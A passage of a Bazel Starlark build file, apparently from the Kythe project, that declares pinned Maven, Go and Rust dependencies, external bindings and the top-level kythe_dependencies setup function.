        # For @com_google_common_flogger
        http_archive,
        name = "google_bazel_common",
        strip_prefix = "bazel-common-b3778739a9c67eaefe0725389f03cf821392ac67",
        sha256 = "4ae0fd0af627be9523a166b88d1298375335f418dcc13a82e9e77a0089a4d254",
        urls = [
            "https://mirror.bazel.build/github.com/google/bazel-common/archive/b3778739a9c67eaefe0725389f03cf821392ac67.zip",
            "https://github.com/google/bazel-common/archive/b3778739a9c67eaefe0725389f03cf821392ac67.zip",
        ],
    )
    maybe(
        git_repository,
        name = "com_google_common_flogger",
        commit = "ca8ad22bc1479b5675118308f88ef3fff7d26c1f",
        remote = "https://github.com/google/flogger",
    )
    # Maven artifacts are pinned to exact versions; conflicts resolve to the
    # pinned version rather than the newest ("pinned" policy below).
    maven_install(
        name = "maven",
        artifacts = [
            "com.beust:jcommander:1.48",
            "com.google.auto.service:auto-service:1.0-rc4",
            "com.google.auto.value:auto-value:1.5.4",
            "com.google.auto:auto-common:0.10",
            "com.google.code.findbugs:jsr305:3.0.1",
            "com.google.code.gson:gson:2.8.5",
            "com.google.common.html.types:types:1.0.8",
            "com.google.errorprone:error_prone_annotations:2.3.1",
            "com.google.guava:guava:26.0-jre",
            "com.google.jimfs:jimfs:1.1",
            "com.google.re2j:re2j:1.2",
            "com.google.truth:truth:1.0",
            "com.googlecode.java-diff-utils:diffutils:1.3.0",
            "org.apache.tomcat:tomcat-annotations-api:9.0.34",
            "junit:junit:4.12",
            "org.checkerframework:checker-qual:2.9.0",
            "org.ow2.asm:asm:7.0",
        ],
        repositories = [
            "https://jcenter.bintray.com",
            "https://maven.google.com",
            "https://repo1.maven.org/maven2",
        ],
        fetch_sources = True,
        generate_compat_repositories = True,  # Required by bazel-common's dependencies
        version_conflict_policy = "pinned",
    )
def _go_dependencies():
go_repository(
name = "com_github_golang_protobuf",
build_file_proto_mode = "disable_global",
importpath = "github.com/golang/protobuf",
patch_args = ["-p1"],
patches = [
"@io_bazel_rules_go//third_party:com_github_golang_protobuf-extras.patch",
"@io_kythe//third_party/go:new_export_license.patch",
],
sum = "h1:ZFgWrT+bLgsYPirOnRfKLYJLvssAegOj/hgyMFdJZe0=",
version = "v1.4.1",
)
go_repository(
name = "com_github_google_uuid",
importpath = "github.com/google/uuid",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:Gkbcsh/GbpXz7lPftLA3P6TYMwjCLYm83jiFQZF/3gY=",
version = "v1.1.1",
)
go_repository(
name = "com_github_jmhodges_levigo",
importpath = "github.com/jmhodges/levigo",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:levigo.patch",
],
sum = "h1:q5EC36kV79HWeTBWsod3mG11EgStG3qArTKcvlksN1U=",
version = "v1.0.0",
)
go_repository(
name = "com_github_google_go_cmp",
importpath = "github.com/google/go-cmp",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4=",
version = "v0.4.0",
)
go_repository(
name = "org_golang_x_sync",
importpath = "golang.org/x/sync",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:vcxGaoTs7kV8m5Np9uUNQin4BrLOthgV7252N8V+FwY=",
version = "v0.0.0-20190911185100-cd5d95a43a6e",
)
go_repository(
name = "com_github_sourcegraph_jsonrpc2",
importpath = "github.com/sourcegraph/jsonrpc2",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:5VGNYxMxzZ8Jb2bARgVl1DNg8vpcd9S8b4MbbjWQ8/w=",
version = "v0.0.0-20191222043438-96c4efab7ee2",
)
go_repository(
name = "com_github_hanwen_go_fuse",
importpath = "github.com/hanwen/go-fuse",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:GxS9Zrn6c35/BnfiVsZVWmsG803xwE7eVRDvcf/BEVc=",
version = "v1.0.0",
)
go_repository(
name = "com_github_golang_snappy",
importpath = "github.com/golang/snappy",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:Qgr9rKW7uDUkrbSmQeiDsGa8SjGyCOGtuasMWwvp2P4=",
version = "v0.0.1",
)
go_repository(
name = "com_github_sourcegraph_go_langserver",
importpath = "github.com/sourcegraph/go-langserver",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:lj2sRU7ZMIkW372IDVGb6fE8VAY4c/EMsiDzrB9vmiU=",
version = "v2.0.0+incompatible",
)
go_repository(
name = "com_github_sergi_go_diff",
importpath = "github.com/sergi/go-diff",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:we8PVUC3FE2uYfodKH/nBHMSetSfHDR6scGdBi+erh0=",
version = "v1.1.0",
)
go_repository(
name = "com_github_google_subcommands",
importpath = "github.com/google/subcommands",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:vWQspBTo2nEqTUFita5/KeEWlUL8kQObDFbub/EN9oE=",
version = "v1.2.0",
)
http_archive(
name = "org_golang_x_tools",
urls = [
"https://mirror.bazel.build/github.com/golang/tools/archive/2bc93b1c0c88b2406b967fcd19a623d1ff9ea0cd.zip",
"https://github.com/golang/tools/archive/2bc93b1c0c88b2406b967fcd19a623d1ff9ea0cd.zip",
],
sha256 = "b05c5b5b9091a35ecb433227ea30aa75cb6b9d9409b308bc75d0975d4a291912",
strip_prefix = "tools-2bc93b1c0c88b2406b967fcd19a623d1ff9ea0cd",
patches = [
# deletegopls removes the gopls subdirectory. It contains a nested
# module with additional dependencies. It's not needed by rules_go.
"@io_bazel_rules_go//third_party:org_golang_x_tools-deletegopls.patch",
# gazelle args: -repo_root . -go_prefix golang.org/x/tools
"@io_bazel_rules_go//third_party:org_golang_x_tools-gazelle.patch",
# extras adds go_tool_library rules for packages under
# go/analysis/passes and their dependencies. These are needed by
# nogo.
"@io_bazel_rules_go//third_party:org_golang_x_tools-extras.patch",
"@io_kythe//third_party/go:add_export_license.patch",
],
patch_args = ["-p1"],
)
go_repository(
name = "org_golang_x_text",
importpath = "golang.org/x/text",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:tW2bmiBqwgJj/UpqtC8EpXEZVYOwU0yG4iWbprSVAcs=",
version = "v0.3.2",
)
go_repository(
name = "org_golang_x_net",
importpath = "golang.org/x/net",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:GuSPYbZzB5/dcLNCwLQLsg3obCJtX9IJhpXkvY7kzk0=",
version = "v0.0.0-20200301022130-244492dfa37a",
)
go_repository(
name = "com_github_pkg_errors",
importpath = "github.com/pkg/errors",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=",
version = "v0.9.1",
)
go_repository(
name = "org_bitbucket_creachadair_stringset",
importpath = "bitbucket.org/creachadair/stringset",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:gQqe4vs8XWgMyijfyKE6K8o4TcyGGrRXe0JvHgx5H+M=",
version = "v0.0.8",
)
go_repository(
name = "org_bitbucket_creachadair_shell",
importpath = "bitbucket.org/creachadair/shell",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:reJflDbKqnlnqb4Oo2pQ1/BqmY/eCWcNGHrIUO8qIzc=",
version = "v0.0.6",
)
go_repository(
name = "org_golang_google_grpc",
importpath = "google.golang.org/grpc",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:bO/TA4OxCOummhSf10siHuG7vJOiwh7SpRpFZDkOgl4=",
version = "v1.28.0",
)
go_repository(
name = "org_golang_x_oauth2",
importpath = "golang.org/x/oauth2",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:TzXSXBo42m9gQenoE3b9BGiEpg5IG2JkU5FkPIawgtw=",
version = "v0.0.0-20200107190931-bf48bf16ab8d",
)
go_repository(
name = "com_github_apache_beam",
build_file_proto_mode = "disable",
importpath = "github.com/apache/beam",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:Dm4cSxkGeH8l9OG2jkOodp2Dg6uZjorV0XU8vDy/fa4=",
version = "v2.19.0+incompatible",
)
go_repository(
name = "org_golang_google_api",
importpath = "google.golang.org/api",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:jz2KixHX7EcCPiQrySzPdnYT7DbINAypCqKZ1Z7GM40=",
version = "v0.20.0",
)
go_repository(
name = "com_google_cloud_go",
importpath = "cloud.google.com/go",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:3ithwDMr7/3vpAMXiH+ZQnYbuIsh+OPhUPMFC9enmn0=",
version = "v0.54.0",
)
go_repository(
name = "io_opencensus_go",
importpath = "go.opencensus.io",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:8sGtKOrtQqkN1bp2AtX+misvLIlOmsEsNd+9NIcPEm8=",
version = "v0.22.3",
)
go_repository(
name = "com_github_syndtr_goleveldb",
importpath = "github.com/syndtr/goleveldb",
sum = "h1:fBdIW9lB4Iz0n9khmH8w27SJ3QEJ7+IgjPEwGSZiFdE=",
version = "v1.0.0",
)
go_repository(
name = "com_github_minio_highwayhash",
importpath = "github.com/minio/highwayhash",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:iMSDhgUILCr0TNm8LWlSjF8N0ZIj2qbO8WHp6Q/J2BA=",
version = "v1.0.0",
)
go_repository(
name = "org_golang_x_sys",
importpath = "golang.org/x/sys",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:uYVVQ9WP/Ds2ROhcaGPeIdVq0RIXVLwsHlnvJ+cT1So=",
version = "v0.0.0-20200302150141-5c8b2ff67527",
)
go_repository(
name = "com_github_datadog_zstd",
importpath = "github.com/DataDog/zstd",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:+IawcoXhCBylN7ccwdwf8LOH2jKq7NavGpEPanrlTzE=",
version = "v1.4.4",
)
go_repository(
name = "com_github_beevik_etree",
importpath = "github.com/beevik/etree",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:T0xke/WvNtMoCqgzPhkX2r4rjY3GDZFi+FjpRZY2Jbs=",
version = "v1.1.0",
)
go_repository(
name = "com_github_google_orderedcode",
importpath = "github.com/google/orderedcode",
sum = "h1:UzfcAexk9Vhv8+9pNOgRu41f16lHq725vPwnSeiG/Us=",
version = "v0.0.1",
)
go_repository(
name = "io_k8s_sigs_yaml",
importpath = "sigs.k8s.io/yaml",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:kr/MCeFWJWTwyaHoR9c8EjH9OumOmoF9YGiZd7lFm/Q=",
version = "v1.2.0",
)
go_repository(
name = "in_gopkg_yaml_v2",
importpath = "gopkg.in/yaml.v2",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:obN1ZagJSUGI0Ek/LBmuj4SNLPfIny3KsKFopxRdj10=",
version = "v2.2.8",
)
go_repository(
name = "com_github_mholt_archiver",
importpath = "github.com/mholt/archiver",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:1dCVxuqs0dJseYEhi5pl7MYPH9zDa1wBi7mF09cbNkU=",
version = "v3.1.1+incompatible",
)
go_repository(
name = "com_github_dsnet_compress",
importpath = "github.com/dsnet/compress",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:PlZu0n3Tuv04TzpfPbrnI0HW/YwodEXDS+oPKahKF0Q=",
version = "v0.0.1",
)
go_repository(
name = "com_github_nwaples_rardecode",
importpath = "github.com/nwaples/rardecode",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:vSxaY8vQhOcVr4mm5e8XllHWTiM4JF507A0Katqw7MQ=",
version = "v1.1.0",
)
go_repository(
name = "com_github_pierrec_lz4",
importpath = "github.com/pierrec/lz4",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:mFe7ttWaflA46Mhqh+jUfjp2qTbPYxLB2/OyBppH9dg=",
version = "v2.4.1+incompatible",
)
go_repository(
name = "com_github_ulikunitz_xz",
importpath = "github.com/ulikunitz/xz",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:YvTNdFzX6+W5m9msiYg/zpkSURPPtOlzbqYjrFn7Yt4=",
version = "v0.5.7",
)
go_repository(
name = "com_github_xi2_xz",
importpath = "github.com/xi2/xz",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:nIPpBwaJSVYIxUFsDv3M8ofmx9yWTog9BfvIu0q41lo=",
version = "v0.0.0-20171230120015-48954b6210f8",
)
maybe(
http_archive,
name = "org_brotli_go",
sha256 = "4c61bfb0faca87219ea587326c467b95acb25555b53d1a421ffa3c8a9296ee2c",
strip_prefix = "brotli-1.0.7/go",
urls = [
"https://mirror.bazel.build/github.com/google/brotli/archive/v1.0.7.tar.gz",
"https://github.com/google/brotli/archive/v1.0.7.tar.gz",
],
)
_gazelle_ignore(
name = "com_github_bazelbuild_rules_go",
actual = "io_bazel_rules_go",
importpath = "github.com/bazelbuild/rules_go",
)
_gazelle_ignore(
name = "com_github_google_brotli",
actual = "org_brotli_go",
importpath = "github.com/google/brotli",
)
go_repository(
name = "co_honnef_go_tools",
importpath = "honnef.co/go/tools",
sum = "h1:sXmLre5bzIR6ypkjXCDI3jHPssRhc8KD/Ome589sc3U=",
version = "v0.0.1-2020.1.3",
)
go_repository(
name = "com_github_burntsushi_toml",
importpath = "github.com/BurntSushi/toml",
sum = "h1:WXkYYl6Yr3qBf1K79EBnL4mak0OimBfB0XUf9Vl28OQ=",
version = "v0.3.1",
)
go_repository(
name = "com_github_burntsushi_xgb",
importpath = "github.com/BurntSushi/xgb",
sum = "h1:1BDTz0u9nC3//pOCMdNH+CiXJVYJh5UQNCOBG7jbELc=",
version = "v0.0.0-20160522181843-27f122750802",
)
go_repository(
name = "com_github_census_instrumentation_opencensus_proto",
importpath = "github.com/census-instrumentation/opencensus-proto",
sum = "h1:glEXhBS5PSLLv4IXzLA5yPRVX4bilULVyxxbrfOtDAk=",
version = "v0.2.1",
)
go_repository(
name = "com_github_client9_misspell",
importpath = "github.com/client9/misspell",
sum = "h1:ta993UF76GwbvJcIo3Y68y/M3WxlpEHPWIGDkJYwzJI=",
version = "v0.3.4",
)
go_repository(
name = "com_github_creachadair_staticfile",
importpath = "github.com/creachadair/staticfile",
sum = "h1:QG0u27/Ietu0UVOk1aMbF6jrWrEzPIdZP4ju3c1PPfY=",
version = "v0.1.2",
)
go_repository(
name = "com_github_davecgh_go_spew",
importpath = "github.com/davecgh/go-spew",
sum = "h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=",
version = "v1.1.1",
)
go_repository(
name = "com_github_dsnet_golib",
importpath = "github.com/dsnet/golib",
sum = "h1:tFh1tRc4CA31yP6qDcu+Trax5wW5GuMxvkIba07qVLY=",
version = "v0.0.0-20171103203638-1ea166775780",
)
go_repository(
name = "com_github_envoyproxy_go_control_plane",
importpath = "github.com/envoyproxy/go-control-plane",
sum = "h1:rEvIZUSZ3fx39WIi3JkQqQBitGwpELBIYWeBVh6wn+E=",
version = "v0.9.4",
)
go_repository(
name = "com_github_envoyproxy_protoc_gen_validate",
importpath = "github.com/envoyproxy/protoc-gen-validate",
sum = "h1:EQciDnbrYxy13PgWoY8AqoxGiPrpgBZ1R8UNe3ddc+A=",
version = "v0.1.0",
)
go_repository(
name = "com_github_fsnotify_fsnotify",
importpath = "github.com/fsnotify/fsnotify",
sum = "h1:IXs+QLmnXW2CcXuY+8Mzv/fWEsPGWxqefPtCP5CnV9I=",
version = "v1.4.7",
)
go_repository(
name = "com_github_go_gl_glfw",
importpath = "github.com/go-gl/glfw",
sum = "h1:QbL/5oDUmRBzO9/Z7Seo6zf912W/a6Sr4Eu0G/3Jho0=",
version = "v0.0.0-20190409004039-e6da0acd62b1",
)
go_repository(
name = "com_github_go_gl_glfw_v3_3_glfw",
importpath = "github.com/go-gl/glfw/v3.3/glfw",
sum = "h1:WtGNWLvXpe6ZudgnXrq0barxBImvnnJoMEhXAzcbM0I=",
version = "v0.0.0-20200222043503-6f7a984d4dc4",
)
go_repository(
name = "com_github_golang_glog",
importpath = "github.com/golang/glog",
sum = "h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58=",
version = "v0.0.0-20160126235308-23def4e6c14b",
)
go_repository(
name = "com_github_golang_groupcache",
importpath = "github.com/golang/groupcache",
sum = "h1:1r7pUrabqp18hOBcwBwiTsbnFeTZHV9eER/QT5JVZxY=",
version = "v0.0.0-20200121045136-8c9f03a8e57e",
)
go_repository(
name = "com_github_golang_mock",
importpath = "github.com/golang/mock",
sum = "h1:ocYkMQY5RrXTYgXl7ICpV0IXwlEQGwKIsery4gyXa1U=",
version = "v1.4.1",
)
go_repository(
name = "com_github_google_btree",
importpath = "github.com/google/btree",
sum = "h1:0udJVsspx3VBr5FwtLhQQtuAsVc79tTq0ocGIPAU6qo=",
version = "v1.0.0",
)
go_repository(
name = "com_github_google_martian",
importpath = "github.com/google/martian",
sum = "h1:/CP5g8u/VJHijgedC/Legn3BAbAaWPgecwXBIDzw5no=",
version = "v2.1.0+incompatible",
)
go_repository(
name = "com_github_google_pprof",
importpath = "github.com/google/pprof",
sum = "h1:SRgJV+IoxM5MKyFdlSUeNy6/ycRUF2yBAKdAQswoHUk=",
version = "v0.0.0-20200229191704-1ebb73c60ed3",
)
go_repository(
name = "com_github_google_renameio",
importpath = "github.com/google/renameio",
sum = "h1:GOZbcHa3HfsPKPlmyPyN2KEohoMXOhdMbHrvbpl2QaA=",
version = "v0.1.0",
)
go_repository(
name = "com_github_googleapis_gax_go_v2",
build_file_proto_mode = "disable",
importpath = "github.com/googleapis/gax-go/v2",
patch_args = ["-p1"],
patches = [
"@io_kythe//third_party/go:add_export_license.patch",
],
sum = "h1:sjZBwGj9Jlw33ImPtvFviGYvseOtDM7hkSKB7+Tv3SM=",
version = "v2.0.5",
)
go_repository(
name = "com_github_gorilla_websocket",
importpath = "github.com/gorilla/websocket",
sum = "h1:q7AeDBpnBk8AogcD4DSag/Ukw/KV+YhzLj2bP5HvKCM=",
version = "v1.4.1",
)
go_repository(
name = "com_github_hashicorp_golang_lru",
importpath = "github.com/hashicorp/golang-lru",
sum = "h1:0hERBMJE1eitiLkihrMvRVBYAkpHzc/J3QdDN+dAcgU=",
version = "v0.5.1",
)
go_repository(
name = "com_github_hpcloud_tail",
importpath = "github.com/hpcloud/tail",
sum = "h1:nfCOvKYfkgYP8hkirhJocXT2+zOD8yUNjXaWfTlyFKI=",
version = "v1.0.0",
)
go_repository(
name = "com_github_jstemmer_go_junit_report",
importpath = "github.com/jstemmer/go-junit-report",
sum = "h1:6QPYqodiu3GuPL+7mfx+NwDdp2eTkp9IfEUpgAwUN0o=",
version = "v0.9.1",
)
go_repository(
name = "com_github_kisielk_gotool",
importpath = "github.com/kisielk/gotool",
sum = "h1:AV2c/EiW3KqPNT9ZKl07ehoAGi4C5/01Cfbblndcapg=",
version = "v1.0.0",
)
go_repository(
name = "com_github_klauspost_compress",
importpath = "github.com/klauspost/compress",
sum = "h1:8VMb5+0wMgdBykOV96DwNwKFQ+WTI4pzYURP99CcB9E=",
version = "v1.4.1",
)
go_repository(
name = "com_github_klauspost_cpuid",
importpath = "github.com/klauspost/cpuid",
sum = "h1:NMpwD2G9JSFOE1/TJjGSo5zG7Yb2bTe7eq1jH+irmeE=",
version = "v1.2.0",
)
go_repository(
name = "com_github_kr_pretty",
importpath = "github.com/kr/pretty",
sum = "h1:L/CwN0zerZDmRFUapSPitk6f+Q3+0za1rQkzVuMiMFI=",
version = "v0.1.0",
)
go_repository(
name = "com_github_kr_pty",
importpath = "github.com/kr/pty",
sum = "h1:VkoXIwSboBpnk99O/KFauAEILuNHv5DVFKZMBN/gUgw=",
version = "v1.1.1",
)
go_repository(
name = "com_github_kr_text",
importpath = "github.com/kr/text",
sum = "h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE=",
version = "v0.1.0",
)
go_repository(
name = "com_github_onsi_ginkgo",
importpath = "github.com/onsi/ginkgo",
sum = "h1:VkHVNpR4iVnU8XQR6DBm8BqYjN7CRzw+xKUbVVbbW9w=",
version = "v1.8.0",
)
go_repository(
name = "com_github_onsi_gomega",
importpath = "github.com/onsi/gomega",
sum = "h1:izbySO9zDPmjJ8rDjLvkA2zJHIo+HkYXHnf7eN7SSyo=",
version = "v1.5.0",
)
go_repository(
name = "com_github_pmezard_go_difflib",
importpath = "github.com/pmezard/go-difflib",
sum = "h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=",
version = "v1.0.0",
)
go_repository(
name = "com_github_prometheus_client_model",
importpath = "github.com/prometheus/client_model",
sum = "h1:gQz4mCbXsO+nc9n1hCxHcGA3Zx3Eo+UHZoInFGUIXNM=",
version = "v0.0.0-20190812154241-14fe0d1b01d4",
)
go_repository(
name = "com_github_rogpeppe_go_internal",
importpath = "github.com/rogpeppe/go-internal",
sum = "h1:RR9dF3JtopPvtkroDZuVD7qquD0bnHlKSqaQhgwt8yk=",
version = "v1.3.0",
)
go_repository(
name = "com_github_stretchr_objx",
importpath = "github.com/stretchr/objx",
sum = "h1:4G4v2dO3VZwixGIRoQ5Lfboy6nUhCyYzaqnIAPPhYs4=",
version = "v0.1.0",
)
go_repository(
name = "com_github_stretchr_testify",
importpath = "github.com/stretchr/testify",
sum = "h1:2E4SXV/wtOkTonXsotYi4li6zVWxYlZuYNCXe9XRJyk=",
version = "v1.4.0",
)
go_repository(
name = "com_google_cloud_go_bigquery",
importpath = "cloud.google.com/go/bigquery",
sum = "h1:xE3CPsOgttP4ACBePh79zTKALtXwn/Edhcr16R5hMWU=",
version = "v1.4.0",
)
go_repository(
name = "com_google_cloud_go_datastore",
importpath = "cloud.google.com/go/datastore",
sum = "h1:/May9ojXjRkPBNVrq+oWLqmWCkr4OU5uRY29bu0mRyQ=",
version = "v1.1.0",
)
go_repository(
name = "com_google_cloud_go_pubsub",
importpath = "cloud.google.com/go/pubsub",
sum = "h1:Lpy6hKgdcl7a3WGSfJIFmxmcdjSpP6OmBEfcOv1Y680=",
version = "v1.2.0",
)
go_repository(
name = "com_google_cloud_go_storage",
importpath = "cloud.google.com/go/storage",
sum = "h1:UDpwYIwla4jHGzZJaEJYx1tOejbgSoNqsAfHAUYe2r8=",
version = "v1.6.0",
)
go_repository(
name = "com_shuralyov_dmitri_gpu_mtl",
importpath = "dmitri.shuralyov.com/gpu/mtl",
sum = "h1:VpgP7xuJadIUuKccphEpTJnWhS2jkQyMt6Y7pJCD7fY=",
version = "v0.0.0-20190408044501-666a987793e9",
)
go_repository(
name = "in_gopkg_check_v1",
importpath = "gopkg.in/check.v1",
sum = "h1:YR8cESwS4TdDjEe65xsg0ogRM/Nc3DYOhEAlW+xobZo=",
version = "v1.0.0-20190902080502-41f04d3bba15",
)
go_repository(
name = "in_gopkg_errgo_v2",
importpath = "gopkg.in/errgo.v2",
sum = "h1:0vLT13EuvQ0hNvakwLuFZ/jYrLp5F3kcWHXdRggjCE8=",
version = "v2.1.0",
)
go_repository(
name = "in_gopkg_fsnotify_v1",
importpath = "gopkg.in/fsnotify.v1",
sum = "h1:xOHLXZwVvI9hhs+cLKq5+I5onOuwQLhQwiu63xxlHs4=",
version = "v1.4.7",
)
go_repository(
name = "in_gopkg_tomb_v1",
importpath = "gopkg.in/tomb.v1",
sum = "h1:uRGJdciOHaEIrze2W8Q3AKkepLTh2hOroT7a+7czfdQ=",
version = "v1.0.0-20141024135613-dd632973f1e7",
)
go_repository(
name = "io_rsc_binaryregexp",
importpath = "rsc.io/binaryregexp",
sum = "h1:HfqmD5MEmC0zvwBuF187nq9mdnXjXsSivRiXN7SmRkE=",
version = "v0.2.0",
)
go_repository(
name = "org_golang_google_appengine",
importpath = "google.golang.org/appengine",
sum = "h1:tycE03LOZYQNhDpS27tcQdAzLCVMaj7QT2SXxebnpCM=",
version = "v1.6.5",
)
go_repository(
name = "org_golang_google_genproto",
importpath = "google.golang.org/genproto",
sum = "h1:pyQjO6BnPvrPMldYxgDlXq9PLahtc0EKnUTYX1pWwXU=",
version = "v0.0.0-20200313141609-30c55424f95d",
)
go_repository(
name = "org_golang_x_crypto",
importpath = "golang.org/x/crypto",
sum = "h1:ObdrDkeb4kJdCP557AjRjq69pTHfNouLtWZG7j9rPN8=",
version = "v0.0.0-20191011191535-87dc89f01550",
)
go_repository(
name = "org_golang_x_exp",
importpath = "golang.org/x/exp",
sum = "h1:QE6XYQK6naiK1EPAe1g/ILLxN5RBoH5xkJk3CqlMI/Y=",
version = "v0.0.0-20200224162631-6cc2880d07d6",
)
go_repository(
name = "org_golang_x_image",
importpath = "golang.org/x/image",
sum = "h1:+qEpEAPhDZ1o0x3tHzZTQDArnOixOzGD9HUJfcg0mb4=",
version = "v0.0.0-20190802002840-cff245a6509b",
)
go_repository(
name = "org_golang_x_lint",
importpath = "golang.org/x/lint",
sum = "h1:Wh+f8QHJXR411sJR8/vRBTZ7YapZaRvUcLFFJhusH0k=",
version = "v0.0.0-20200302205851-738671d3881b",
)
go_repository(
name = "org_golang_x_mobile",
importpath = "golang.org/x/mobile",
sum = "h1:4+4C/Iv2U4fMZBiMCc98MG1In4gJY5YRhtpDNeDeHWs=",
version = "v0.0.0-20190719004257-d2bd2a29d028",
)
go_repository(
name = "org_golang_x_mod",
importpath = "golang.org/x/mod",
sum = "h1:KU7oHjnv3XNWfa5COkzUifxZmxp1TyI7ImMXqFxLwvQ=",
version = "v0.2.0",
)
go_repository(
name = "org_golang_x_time",
importpath = "golang.org/x/time",
sum = "h1:/5xXl8Y5W96D+TtHSlonuFqGHIWVuyCkGJLwGh9JJFs=",
version = "v0.0.0-20191024005414-555d28b269f0",
)
go_repository(
name = "org_golang_x_xerrors",
importpath = "golang.org/x/xerrors",
sum = "h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=",
version = "v0.0.0-20191204190536-9bdfabe68543",
)
go_repository(
name = "com_github_frankban_quicktest",
importpath = "github.com/frankban/quicktest",
sum = "h1:2QxQoC1TS09S7fhCPsrvqYdvP1H5M1P1ih5ABm3BTYk=",
version = "v1.7.2",
)
def _rust_dependencies():
    """Fetches the crates.io dependencies for Kythe's Rust targets.

    Each helper pulls the pinned remote crates for one Rust component
    (example binary, extractor, indexer).
    """
    fetch_example_hello_world_remote_crates()
    fetch_extractor_remote_crates()
    fetch_indexer_remote_crates()
def _bindings():
    """Declares //external bindings required by Kythe and its dependencies.

    Each `maybe(native.bind, ...)` is a no-op if the binding already exists,
    so this is safe to call from multiple WORKSPACE setups.
    """
    maybe(
        native.bind,
        name = "vnames_config",
        actual = "@io_kythe//kythe/data:vnames_config",
    )
    maybe(
        native.bind,
        name = "libuuid",
        actual = "@io_kythe//third_party:libuuid",
    )
    maybe(
        native.bind,
        name = "libmemcached",
        actual = "@org_libmemcached_libmemcached//:libmemcached",
    )
    maybe(
        native.bind,
        name = "guava",  # required by @com_google_protobuf
        actual = "@io_kythe//third_party/guava",
    )
    maybe(
        native.bind,
        name = "gson",  # required by @com_google_protobuf
        actual = "@maven//:com_google_code_gson_gson",
    )
    maybe(
        native.bind,
        name = "zlib",  # required by @com_google_protobuf
        actual = "@net_zlib//:zlib",
    )
def _extractor_image_dependencies():
    """Defines external repositories necessary for extractor images."""
    # NOTE(review): these repositories are pinned by tag only (no sum/version
    # pair), so the fetches are not checksum-verified like the ones above.
    go_repository(
        name = "com_github_bazelbuild_bazelisk",
        importpath = "github.com/bazelbuild/bazelisk",
        tag = "v1.3.0",
    )
    go_repository(
        name = "com_github_mitchellh_go_homedir",
        importpath = "github.com/mitchellh/go-homedir",
        tag = "v1.1.0",
    )
    go_repository(
        name = "com_github_hashicorp_go_version",
        importpath = "github.com/hashicorp/go-version",
        tag = "v1.1.0",
    )
def _sample_ui_dependencies():
    """Defines external repositories necessary for building the sample UI."""
    # Leiningen (Clojure build tool) is fetched directly and checksum-verified.
    lein_repository(
        name = "org_leiningen",
        sha256 = "a0a1f093677045c4e1e40219ccc989acd61433f61c50e098a2185faf4f03553c",
        version = "2.5.3",
    )
def kythe_dependencies(sample_ui = True):
    """Defines external repositories for Kythe dependencies.
    Call this once in your WORKSPACE file to load all @io_kythe dependencies.

    Args:
      sample_ui: also fetch the dependencies needed to build the sample UI
        (Leiningen) when True.
    """
    _proto_dependencies()
    _cc_dependencies()
    _go_dependencies()
    _java_dependencies()
    _rust_dependencies()

    # proto_library, cc_proto_library, and java_proto_library rules implicitly
    # depend on @com_google_protobuf for protoc and proto runtimes.
    maybe(
        http_archive,
